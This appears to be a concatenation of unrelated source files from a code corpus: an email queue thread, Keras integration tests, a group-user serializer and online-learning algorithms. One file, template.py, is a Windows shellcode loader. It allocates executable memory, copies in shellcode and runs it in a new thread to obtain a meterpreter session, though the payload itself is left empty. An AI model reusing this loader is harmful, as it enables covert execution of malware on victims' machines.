instead.
Sends at most 1 email every _min_send_interval seconds.
Loops until someone calls shutdown().
"""
while not self._shutdown_flag:
try:
while True:
email = self._email_queue.get(block=True, timeout=0.1)
if not isinstance(email, Email):
warning = ('Item dequeued for emailing that is '
'not an email: {0}'.format(email))
logger.log_warning(warning)
else:
self._send_email_with_rate_limiting(email)
except Empty:
pass
except Exception as e:
logger.log_error('Error in email sender thread: {0}'
.format(e))
def _send_email_with_rate_limiting(self, email: Email):
# Send the email. Sleep first if need be.
#
# :param email: the email to send
# if _min_send_interval seconds have not elapsed since the last email
# was sent, sleep until _min_send_interval seconds have elapsed
current_time = time()
if current_time - self._last_send_time < config.email_interval:
elapsed_time = current_time - self._last_send_time
sleep_time = config.email_interval - elapsed_time
sleep(sleep_time)
self._last_send_time = current_time
try:
email.send()
logger.log_info('Sent email: {0}'.format(email))
except Exception as e:
if not email.max_send_attempts_reached():
logger.log_warning('Email sending failed, will retry')
self._email_queue.put(email)
else:
error = ('Failed to send email ({0}) after several '
'attempts: {1}'.format(email, e))
logger.log_error(error)
# module-level instance for global email sending
email_sender = EmailSenderThread()
| agpl-3.0 | 5,637,033,515,681,715,000 | 30.821429 | 77 | 0.628507 | false |
jendap/tensorflow | tensorflow/python/keras/integration_test.py | 1 | 10325 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import dtypes
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import nn_ops as nn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.platform import test
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class VectorClassificationIntegrationTest(keras_parameterized.TestCase):
def test_vector_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_model_from_layers(
[keras.layers.Dense(16, activation='relu'),
keras.layers.Dropout(0.1),
keras.layers.Dense(y_train.shape[-1], activation='softmax')],
input_shape=x_train.shape[1:])
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
def test_vector_classification_shared_model(self):
# Test that Sequential models that feature internal updates
# and internal losses can be shared.
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
base_model = testing_utils.get_model_from_layers(
[keras.layers.Dense(16,
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-5),
bias_regularizer=keras.regularizers.l2(1e-5)),
keras.layers.BatchNormalization()],
input_shape=x_train.shape[1:])
x = keras.layers.Input(x_train.shape[1:])
y = base_model(x)
y = keras.layers.Dense(y_train.shape[-1], activation='softmax')(y)
model = keras.models.Model(x, y)
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
if not testing_utils.should_run_eagerly():
self.assertEqual(len(model.losses), 2)
self.assertEqual(len(model.updates), 2)
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
# See b/122473407
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TimeseriesClassificationIntegrationTest(keras_parameterized.TestCase):
@keras_parameterized.run_with_all_model_types
def test_timeseries_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(4, 10),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
layers = [
keras.layers.LSTM(5, return_sequences=True),
keras.layers.GRU(y_train.shape[-1], activation='softmax')
]
model = testing_utils.get_model_from_layers(
layers, input_shape=x_train.shape[1:])
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=15, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
def test_timeseries_classification_sequential_tf_rnn(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(4, 10),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(keras.layers.RNN(rnn_cell.LSTMCell(5), return_sequences=True,
input_shape=x_train.shape[1:]))
model.add(keras.layers.RNN(rnn_cell.GRUCell(y_train.shape[-1],
activation='softmax',
dtype=dtypes.float32)))
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=15, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class ImageClassificationIntegrationTest(keras_parameterized.TestCase):
def test_image_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10, 10, 3),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
layers = [
keras.layers.Conv2D(4, 3, padding='same', activation='relu'),
keras.layers.Conv2D(8, 3, padding='same'),
keras.layers.BatchNormalization(),
keras.layers.Conv2D(8, 3, padding='same'),
keras.layers.Flatten(),
keras.layers.Dense(y_train.shape[-1], activation='softmax')
]
model = testing_utils.get_model_from_layers(
layers, input_shape=x_train.shape[1:])
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
@keras_parameterized.run_all_keras_modes
class ActivationV2IntegrationTest(keras_parameterized.TestCase):
"""Tests activation function V2 in model exporting and loading.
This test is to verify in TF 2.x, when 'tf.nn.softmax' is used as an
  activation function, its model exporting and loading work as expected.
Check b/123041942 for details.
"""
def test_serialization_v2_model(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = keras.Sequential([
keras.layers.Flatten(input_shape=x_train.shape[1:]),
keras.layers.Dense(10, activation=nn.relu),
# To mimic 'tf.nn.softmax' used in TF 2.x.
keras.layers.Dense(y_train.shape[-1], activation=nn.softmax_v2),
])
# Check if 'softmax' is in model.get_config().
last_layer_activation = model.get_layer(index=2).get_config()['activation']
self.assertEqual(last_layer_activation, 'softmax')
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
model.fit(x_train, y_train, epochs=2, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
output_path = keras.saving.saved_model.export(
model, os.path.join(self.get_temp_dir(), 'tf_keras_saved_model'))
loaded_model = keras.saving.saved_model.load_from_saved_model(output_path)
self.assertEqual(model.summary(), loaded_model.summary())
if __name__ == '__main__':
test.main()
| apache-2.0 | 8,766,601,696,139,803,000 | 40.971545 | 80 | 0.637385 | false |
Disguisenberg/Metastasis-Framework | template/template.py | 1 | 2293 | import ctypes
# ctypes makes it very simple to interact with the Windows API in a Python script, so it will be a required import for this script. It provides C compatible data types and allows calling functions in DLLs or shared libraries
shellcode = (
);
# Shellcode - This is the shellcode that will be injected into memory and then executed, which will grant us an SSL-certified meterpreter session
# We will be using 4 Win32 APIs to execute the shellcode; these APIs are very important in dynamic memory management on Windows platforms
ptr = ctypes.windll.kernel32.VirtualAlloc(0,4096,ctypes.c_int(0x1000),ctypes.c_int(0x40))
# First VirtualAlloc() function will allow us to create a new executable memory region and copy our shellcode to it and after that execute it
b = bytearray() # Store b as a bytearray() so the shellcode bytes can be passed to from_buffer(), which requires a mutable buffer rather than an immutable str/bytes object
b.extend(map(ord, shellcode))
buf = (ctypes.c_char * len(shellcode)).from_buffer(b)
# buf is a ctypes char array the size of our shellcode, constructed from the mutable buffer b
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# The RtlMoveMemory() function accepts 3 arguments: a pointer to the destination (returned from VirtualAlloc()), a pointer to the memory to be copied, and the number of bytes to be copied, in our case the size of the shellcode
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# CreateThread() accepts 6 arguments; in our case the third argument is very important: we need to pass a pointer to the application-defined function to be executed by the thread, i.e. the pointer returned by VirtualAlloc(). If the function succeeds, the return value is a handle to the new thread.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
# WaitForSingleObject() accepts 2 arguments: the first one is the handle to the object (returned by CreateThread()) and the second is the time-out interval in milliseconds (-1 here, i.e. wait indefinitely until the thread finishes)
| mit | 2,696,099,267,623,453,000 | 90.72 | 277 | 0.685565 | false |
renalreg/radar | radar/api/serializers/group_users.py | 1 | 2305 | from cornflake import fields
from cornflake.exceptions import ValidationError
from cornflake.sqlalchemy_orm import ModelSerializer
from radar.api.serializers.common import (
EnumLookupField,
GroupField,
MetaMixin,
StringLookupField,
UserMixin,
)
from radar.exceptions import PermissionDenied
from radar.models.groups import GroupUser
from radar.permissions import has_permission_for_group_role
from radar.roles import ROLE, ROLE_NAMES
class GroupUserSerializer(UserMixin, MetaMixin, ModelSerializer):
group = GroupField()
role = EnumLookupField(ROLE, ROLE_NAMES)
permissions = fields.ListField(child=fields.StringField(), read_only=True)
managed_roles = fields.ListField(child=StringLookupField(ROLE_NAMES), read_only=True)
class Meta(object):
model_class = GroupUser
exclude = ['group_id']
def check_permissions(self, user, group, role):
current_user = self.context['user']
# Can't change your own role
if current_user == user and not current_user.is_admin:
raise PermissionDenied()
# Check the user has permission for the group and role
if not has_permission_for_group_role(current_user, group, role):
raise PermissionDenied()
def is_duplicate(self, data):
group = data['group']
user = data['user']
role = data['role']
instance = self.instance
duplicate = any(
group == x.group and
role == x.role and
(instance is None or instance != x)
for x in user.group_users
)
return duplicate
def validate(self, data):
data = super(GroupUserSerializer, self).validate(data)
instance = self.instance
# Updating existing record
if instance is not None:
self.check_permissions(instance.user, instance.group, instance.role)
self.check_permissions(data['user'], data['group'], data['role'])
# Check that the user doesn't already belong to this group
# Note: it's important this check happens after the above permission check to prevent membership enumeration
if self.is_duplicate(data):
raise ValidationError({'group': 'User already belongs to this group.'})
return data
| agpl-3.0 | -7,541,290,508,817,129,000 | 31.928571 | 116 | 0.667245 | false |
Balandat/cont_no_regret | ContNoRegret/NoRegretAlgos.py | 1 | 23992 | '''
Basic Algorithms for the Continuous No-Regret Problem.
@author: Maximilian Balandat
@date May 25, 2015
'''
import numpy as np
from .LossFunctions import ZeroLossFunction, ctypes_integrate
from .DualAveraging import compute_nustar
from .Domains import nBox, UnionOfDisjointnBoxes, DifferenceOfnBoxes
from .Potentials import ExponentialPotential, pExpPotential
from scipy.stats import linregress
class ContNoRegretProblem(object):
""" Basic class describing a Continuous No-Regret problem. """
def __init__(self, domain, lossfuncs, L, M, desc='nodesc'):
""" Constructor for the basic problem class. Here lossfuncs
is a list of loss LossFunction objects. """
self.domain, self.L, self.M = domain, L, M
self.lossfuncs = lossfuncs
self.T = len(lossfuncs)
self.optaction, self.optval = None, None
self.desc = desc
if domain.n == 2:
if isinstance(domain, nBox):
self.pltpoints = [domain.grid(2000)]
elif isinstance(domain, UnionOfDisjointnBoxes):
weights = np.array([nbox.volume for nbox in domain.nboxes])
self.pltpoints = [nbox.grid(2000*weight/sum(weights)) for nbox,weight in zip(domain.nboxes,weights)]
def cumulative_loss(self, points):
""" Computes the cumulative loss at the given points """
loss = np.zeros((points.shape[0], 1))
for lossfunc in self.lossfuncs:
loss = loss + lossfunc.val(points)
return loss
def create_pltpoints(self, Nplot):
""" Create a number of points used for plotting the evolution of
the density function for the DA algorithm """
if self.domain.n != 2:
return None
if isinstance(self.domain, nBox):
return [self.domain.grid(Nplot)]
elif isinstance(self.domain, UnionOfDisjointnBoxes):
weights = np.array([nbox.volume for nbox in self.domain.nboxes])/self.domain.volume
return [nbox.grid(np.ceil(weight*Nplot)) for nbox,weight in zip(self.domain.nboxes, weights)]
elif isinstance(self.domain, DifferenceOfnBoxes):
if len(self.domain.inner) > 1:
raise Exception('Can only create pltpoints for DifferenceOfnBoxes with single box missing!')
bnds_inner, bnds_outer = self.domain.inner[0].bounds, self.domain.outer.bounds
nboxes = [nBox([bnds_outer[0], [bnds_inner[1][1], bnds_outer[1][1]]]),
nBox([bnds_outer[0], [bnds_outer[1][0], bnds_inner[1][0]]]),
nBox([[bnds_outer[0][0], bnds_inner[0][0]], bnds_inner[1]]),
nBox([[bnds_inner[0][1], bnds_outer[0][1]], bnds_inner[1]])]
weights = np.array([nbox.volume for nbox in nboxes])/self.domain.volume
return [nbox.grid(np.ceil(weight*Nplot)) for nbox,weight in zip(nboxes, weights)]
def run_simulation(self, N, algo, Ngrid=100000, label='nolabel', **kwargs):
""" Runs the no-regret algorithm for different parameters and returns the
results as a 'Result' object. Accepts optimal constant rates in the
dictionary 'etaopts', constant rates in the array-like 'etas', and
time-varying rates with parameters in the array-like 'alphas', 'thetas' """
result_args = {}
if algo == 'Greedy':
regs_Greedy = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
print('Simulating Greedy')
regrets = self.simulate(N, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_Greedy, regrets)
result_args['regs_{}'.format(algo)] = regs_Greedy
elif algo == 'GP':
regs_GP = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
print('Simulating GP, rate eta_t=t^(-0.5)')
regrets = self.simulate(N, etas=(1+np.arange(self.T))**(-0.5), algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_GP, regrets)
self.regret_bound(regs_GP, algo, alpha=0.5)
result_args['regs_{}'.format(algo)] = regs_GP
elif algo == 'OGD':
regs_OGD = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
theta = 1/kwargs['H']
print('Simulating OGD, rate eta_t={0:.2f}t^(-1)'.format(theta))
regrets = self.simulate(N, etas=theta/(1+np.arange(self.T)), algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_OGD, regrets)
self.regret_bound(regs_OGD, algo, H=kwargs['H'])
result_args['regs_{}'.format(algo)] = regs_OGD
elif algo == 'DA':
pot = kwargs['potential']
reg_info = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
if kwargs.get('opt_rate') == True:
if isinstance(pot, ExponentialPotential):
theta = np.sqrt((pot.c_omega*(self.domain.n-np.log(self.domain.v))
+ pot.d_omega*self.domain.v)/2/self.M**2)
alpha = None
print('Simulating {0}, {1}, opt. rate '.format(algo, pot.desc) +
'eta_t={0:.3f} sqrt(log t/t)'.format(theta))
etas = theta*np.sqrt(np.log(1+np.arange(self.T)+1)/(1+np.arange(self.T)))
elif isinstance(pot, pExpPotential):
try:
M = pot.M
except AttributeError:
M = self.M
theta = np.sqrt((pot.c_omega*(self.domain.n-np.log(self.domain.v))
+ pot.d_omega*self.domain.v)/2/M**2)
alpha = None
print('Simulating {0}, {1}, opt. rate '.format(algo, pot.desc) +
'eta_t={0:.3f} sqrt(log t/t)'.format(theta))
etas = theta*np.sqrt(np.log(1+np.arange(self.T)+1)/(1+np.arange(self.T)))
else:
try:
M = pot.M
except AttributeError:
M = self.M
alpha, theta = pot.alpha_opt(self.domain.n), pot.theta_opt(self.domain, M)
print('Simulating {0}, {1}, opt. rate '.format(algo, pot.desc) +
'eta_t={0:.3f}t^(-{1:.3f})$'.format(theta, alpha))
etas = theta*(1+np.arange(self.T))**(-alpha)
regrets = self.simulate(N, etas=etas, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(reg_info, regrets)
self.regret_bound(reg_info, algo, alpha=alpha, theta=theta, potential=pot)
result_args['regs_DAopt'] = reg_info
if 'etas' in kwargs:
print('Simulating {0}, {1}, custom rate'.format(algo, pot.desc))
regrets = self.simulate(N, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(reg_info, regrets)
# self.regret_bound(reg_info, algo, alpha=alpha, theta=theta, potential=pot)
result_args['regs_DAetas'] = reg_info
if kwargs.get('animate') is not None:
result_args['pltdata'] = kwargs.get('animate')
if kwargs.get('KL') is not None:
result_args['KL'] = kwargs.get('KL')
# if 'etaopts' in kwargs:
# regs_etaopts = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
# 'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
# for T,eta in kwargs['etaopts'].items():
# if algo == 'DA':
# print('Simulating {0}, {1}, opt. constant rate eta_t={2:.3f}'.format(algo, pot.desc, eta))
# else:
# print('Simulating {0}, opt. constant rate eta_t={1:.3f}'.format(algo, eta))
# regrets = self.simulate(N, etas=eta*np.ones(self.T), algo=algo, Ngrid=Ngrid, **kwargs)[2]
# self.parse_regrets(regs_etaopts, regrets)
# result_args['regs_etaopts'] = regs_etaopts
# if 'etas' in kwargs:
# regs_etas = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
# 'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
# for eta in kwargs['etas']:
# if algo == 'DA':
# print('Simulating {0}, {1}, constant rate eta={2:.3f}'.format(algo, kwargs['potential'].desc, eta))
# else:
# print('Simulating {0}, constant rate eta={1:.3f}'.format(algo, eta))
# regrets = self.simulate(N, etas=eta*np.ones(self.T), algo=algo, Ngrid=Ngrid, **kwargs)[2]
# self.parse_regrets(regs_etas, regrets)
# result_args['etas'] = kwargs['etas']
# result_args['regs_etas'] = regs_etas
# if 'alphas' in kwargs:
# regs_alphas = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
# 'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
# for alpha,theta in zip(kwargs['alphas'], kwargs['thetas']): # run for Nloss different sequences of loss functions
# if algo == 'DA':
# print('Simulating {0}, {1}, decaying rate with alpha={2:.3f}, theta={3}'.format(algo, kwargs['potential'].desc, alpha, theta))
# else:
# print('Simulating {0}, decaying rate with alpha={1:.3f}, theta={2}'.format(algo, alpha, theta))
# regrets = self.simulate(N, etas=theta*(1+np.arange(self.T))**(-alpha), algo=algo, Ngrid=Ngrid, **kwargs)[2]
# self.parse_regrets(regs_alphas, regrets)
# self.regret_bound(regs_alphas, algo, alpha=alpha, theta=theta, potential=kwargs['potential'])
# result_args['alphas'] = kwargs['alphas']
# result_args['thetas'] = kwargs['thetas']
# result_args['regs_alphas'] = regs_alphas
else:
regs_norate = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
print('Simulating {0}, exp-concavity parameter alpha={1:.3f}'.format(algo, kwargs['alpha']))
regrets = self.simulate(N, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_norate, regrets)
self.regret_bound(regs_norate, algo, **kwargs)
result_args['regs_{}'.format(algo)] = regs_norate
# write the results to file (save memory) and return the file handler
results = Results(self, label=label, algo=algo, **result_args)
return results
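    # Illustrative usage sketch (added; not part of the original module — the domain,
    # loss functions and constants below are assumed placeholders):
    #   dom = nBox([[0.0, 1.0], [0.0, 1.0]])
    #   prob = ContNoRegretProblem(dom, lossfuncs, L=1.0, M=1.0, desc='example')
    #   res = prob.run_simulation(N=20, algo='GP', label='GP run', pid=0)
    # This would simulate 20 sample paths of the projected-gradient strategy with the
    # default decaying rate eta_t = t^(-0.5) and return a Results object.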
def simulate(self, N, algo='DA', Ngrid=200000, **kwargs):
""" Simulates the result of running the No-Regret algorithm (N times).
Returns a list of sequences of decisions and associated losses, one for each run.
The grid is used for computing both the regret and the actions! """
if algo in ['DA', 'GP', 'OGD']:
etas = kwargs.get('etas')
if algo == 'DA':
pot = kwargs['potential']
if algo in ['ONS', 'FTAL', 'EWOO']:
alpha = kwargs['alpha']
beta = 0.5*np.minimum(1/4/self.L/self.domain.diameter, alpha)
epsilon = 1/beta**2/self.domain.diameter**2
# set up some data structures for keeping record
actions, losses, cumloss, regrets = [], [], [], []
gridpoints = self.domain.grid(Ngrid)
approxL = np.zeros(gridpoints.shape[0])
cumLossFunc = ZeroLossFunction(self.domain)
# now run the iterations
for t, lossfunc in enumerate(self.lossfuncs):
if t == 0:
print('pid {}: Starting...'.format(kwargs['pid']))
elif t % 25 == 0:
print('pid {}: t={}'.format(kwargs['pid'], t))
if algo == 'Greedy':
if t == 0:
action = self.domain.sample_uniform(N)
else:
action = np.array([cumLossFunc.min(argmin=True)[1],]*N)
if algo in ['GP', 'OGD']: # GP and OGD are the same except for the rates
if t == 0:
action = self.domain.sample_uniform(N) # pick arbitrary action in the first step, may as well sample
else:
action = self.lossfuncs[t-1].proj_gradient(actions[-1], etas[t]) # do the projected gradient step
elif algo == 'DA': # Our very own Dual Averaging algorithm
if t == 0:
# compute nustar for warm-starting the intervals of root-finder
nustar = -1/etas[t]*pot.phi_inv(1/self.domain.volume)
action = self.domain.sample_uniform(N)
if kwargs.get('KL') is not None:
kwargs.get('KL').append(0)
else:
nustar = compute_nustar(self.domain, pot, etas[t], cumLossFunc, self.M, nustar,
etas[t-1], t, pid=kwargs['pid'], tmpfolder=kwargs['tmpfolder'], KL=kwargs.get('KL'))
weights = np.maximum(pot.phi(-etas[t]*(approxL + nustar)), 0)
np.random.seed()
action = gridpoints[np.random.choice(weights.shape[0], size=N, p=weights/np.sum(weights))]
del weights
if kwargs.get('animate') is not None:
kwargs.get('animate').append([np.maximum(pot.phi(-etas[t]*(cumLossFunc.val(pltpoints) + nustar)), 0)
for pltpoints in self.pltpoints])
elif algo == 'ONS': # Hazan's Online Newton Step
if t == 0:
action = self.domain.sample_uniform(N) # pick arbitrary action in the first step, may as well sample
grad = lossfunc.grad(action)
A = np.einsum('ij...,i...->ij...', grad, grad) + epsilon*np.array([np.eye(self.domain.n),]*N)
Ainv = np.array([np.linalg.inv(mat) for mat in A])
else:
points = actions[-1] - np.einsum('ijk...,ik...->ij...', Ainv, grad)/beta
action = self.domain.gen_project(points, A)
grad = lossfunc.grad(action)
A = A + np.einsum('ij...,i...->ij...', grad, grad)
z = np.einsum('ijk...,ik...->ij...', Ainv, grad)
Ainv = Ainv - np.einsum('ij...,i...->ij...', z, z)/(1 + np.einsum('ij,ij->i',grad,z))[:,np.newaxis,np.newaxis]
elif algo == 'FTAL':
if t == 0:
action = self.domain.sample_uniform(N) # pick arbitrary action in the first step, may as well sample
grad = lossfunc.grad(action)
A = np.einsum('ij...,i...->ij...', grad, grad)
b = grad*(np.einsum('ij,ij->i', grad, action) - 1/beta)[:,np.newaxis]
Ainv = np.array([np.linalg.pinv(mat) for mat in A]) # so these matrices are singular... what's the issue?
else:
points = np.einsum('ijk...,ik...->ij...', Ainv, b)
action = self.domain.gen_project(points, A)
grad = lossfunc.grad(action)
A = A + np.einsum('ij...,i...->ij...', grad, grad)
b = b + grad*(np.einsum('ij,ij->i', grad, action) - 1/beta)[:,np.newaxis]
# the following uses the matrix inversion lemma for
# efficient computation the update of Ainv
z = np.einsum('ijk...,ik...->ij...', Ainv, grad)
Ainv = Ainv - np.einsum('ij...,i...->ij...', z, z)/(1 + np.einsum('ij,ij->i',grad,z))[:,np.newaxis,np.newaxis]
elif algo == 'EWOO':
if t == 0:
if not self.domain.isconvex():
raise Exception('EWOO algorithm only makes sense if the domain is convex!')
action = self.domain.sample_uniform(N)
else:
if isinstance(self.domain, nBox):
ranges = [self.domain.bounds]
elif isinstance(self.domain, UnionOfDisjointnBoxes):
ranges = [nbox.bounds for nbox in self.domain.nboxes]
else:
raise Exception('For now, domain must be an nBox or a UnionOfDisjointnBoxes!')
action_ewoo = action_EWOO(cumLossFunc, alpha, ranges, tmpfolder=kwargs['tmpfolder'])
action = np.array([action_ewoo,]*N)
# now store the actions, losses, etc.
actions.append(action)
loss = lossfunc.val(action)
losses.append(loss)
if t == 0:
cumloss.append(loss)
cumLossFunc = lossfunc
else:
cumloss.append(cumloss[-1] + loss)
cumLossFunc = cumLossFunc + lossfunc
# compute and append regret
approxL += lossfunc.val(gridpoints)
optval = cumLossFunc.min()
regrets.append(cumloss[-1] - optval)
return np.transpose(np.array(actions), (1,0,2)), np.transpose(np.array(losses)), np.transpose(np.array(regrets))
def parse_regrets(self, reg_results, regrets):
""" Function that computes some aggregate information from the
raw regret samples in the list 'regrets' """
reg_results['savg'].append(np.average(regrets, axis=0))
reg_results['perc_10'].append(np.percentile(regrets, 10, axis=0))
reg_results['perc_90'].append(np.percentile(regrets, 90, axis=0))
reg_results['tsavg'].append(reg_results['savg'][-1]/(1+np.arange(self.T)))
reg_results['tavg_perc_10'].append(reg_results['perc_10'][-1]/(1+np.arange(self.T)))
reg_results['tavg_perc_90'].append(reg_results['perc_90'][-1]/(1+np.arange(self.T)))
return reg_results
def regret_bound(self, reg_results, algo, **kwargs):
""" Computes the regret bound for the ContNoRegret Problem. """
t = 1 + np.arange(self.T)
n, D, L = self.domain.n, self.domain.diameter, self.L
if algo == 'DA':
pot, v = kwargs['potential'], self.domain.v
if 'etas' in kwargs:
etas = kwargs['etas']
raise NotImplementedError('Need to implement general bound in terms of etas')
else:
if (isinstance(pot, ExponentialPotential) or isinstance(pot, pExpPotential)):
reg_bnd = self.M*np.sqrt(8*(pot.c_omega*(n-np.log(v)) + pot.d_omega*v))*np.sqrt(np.log(t+1)/t) + L*D/t
else:
alpha, theta = kwargs['alpha'], kwargs['theta']
lpsi = pot.l_psi()[0]
C, epsilon = pot.bounds_asymp()
try:
M = pot.M
except AttributeError:
M = self.M
reg_bnd = (M**2*theta/lpsi/(1-alpha)*t**(-alpha)
+ (L*D + C/theta*v**(-epsilon))*t**(-(1-alpha)/(1+n*epsilon)))
elif algo == 'GP':
# for now assume eta_t = t**(-0.5)
reg_bnd = (D**2/2 + L**2)*t**(-0.5) - L**2/2/t
elif algo == 'OGD':
reg_bnd = L**2/2/kwargs['H']*(1+np.log(t))/t
elif algo == 'ONS':
reg_bnd = 5*(1/kwargs['alpha'] + L*D)*n*np.log(t+1)/t
elif algo == 'FTAL':
reg_bnd = 64*(1/kwargs['alpha'] + L*D)*n*(1+np.log(t))/t
elif algo == 'EWOO':
reg_bnd = 1/kwargs['alpha']*n*(1+np.log(t+1))/t
else:
raise NotImplementedError
reg_results['tsavgbnd'].append(reg_bnd)
class Results(object):
""" Class for 'result' objects that contain simulation results
generated by ContNoRegretProblems """
def __init__(self, problem, **kwargs):
self.problem = problem #, self.regs = problem, regs
self.label = kwargs.get('label')
self.algo = kwargs.get('algo')
if kwargs.get('pltdata') is not None:
self.pltdata = kwargs.get('pltdata')
if kwargs.get('KL') is not None:
self.KL = kwargs.get('KL')
if 'etas' in kwargs:
self.etas = kwargs['etas']
if self.algo == 'DA':
            try: self.regs_norate = kwargs['regs_DAopt']
            except KeyError: pass
            try: self.regs_norate = kwargs['regs_DAetas']
            except KeyError: pass
try: self.etaopts, self.regs_etaopts = kwargs['etaopts'], kwargs['regs_etaopts']
except KeyError: pass
